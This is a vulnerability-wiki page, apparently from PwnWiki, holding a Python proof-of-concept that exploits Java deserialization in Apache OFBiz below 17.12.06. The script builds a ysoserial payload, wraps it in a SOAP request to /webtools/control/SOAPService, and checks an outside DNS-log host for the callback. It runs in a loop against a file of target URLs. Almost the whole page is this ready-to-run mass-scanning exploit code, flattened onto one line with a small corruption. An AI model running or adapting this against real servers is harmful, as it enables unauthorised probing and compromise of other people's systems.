免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
Воздействие уязвимости
Apache OFBiz < 17.12.06
POC
#coding:utf-8 import binascii import os import requests import urllib3 import uuid urllib3.disable_warnings() def main(): id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")0 if(not os.path.exists("target.txt")): exit("put url in target.txt! ") if(not os.path.exists("ysoserial.jar")): exit("where is ysoserial.jar?") with open("target.txt")as f: urls = f.readlines() for url in urls: url = url.strip() uid = uuid.uuid1().hex cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id) r = os.popen(cmd) r.close() with open("tmp",'rb') as f: payload = binascii.hexlify(f.read()) data = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>{0}</cus-obj> </map-Key> <map-Value> <std-String value="http://baidu.com"/> </map-Value> </map-Entry> </map-HashMap> </ser> </soapenv:Body> </soapenv:Envelope> '''.format(payload.decode()) headers = { "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" } url = url+"/webtools/control/SOAPService" try: requests.post(url,data=data,verify=False,headers=headers,timeout=5) requests.post(url,data=data,verify=False,headers=headers,timeout=5) requests.post(url,data=data,verify=False,headers=headers,timeout=5) except: pass dnslogresurl = "https://dns.xn--9tr.com/"+id if(uid in requests.get(dnslogresurl).text): print("+ {0} 漏洞存在".format(url)) else: print("- {0} 漏洞不存在".format(url)) print("+ 请到 {0} 查看结果".format(dnslogresurl)) if __name__ == "__main__": main()
PWNWIK.COM==免费、自由、人人可编辑的漏洞库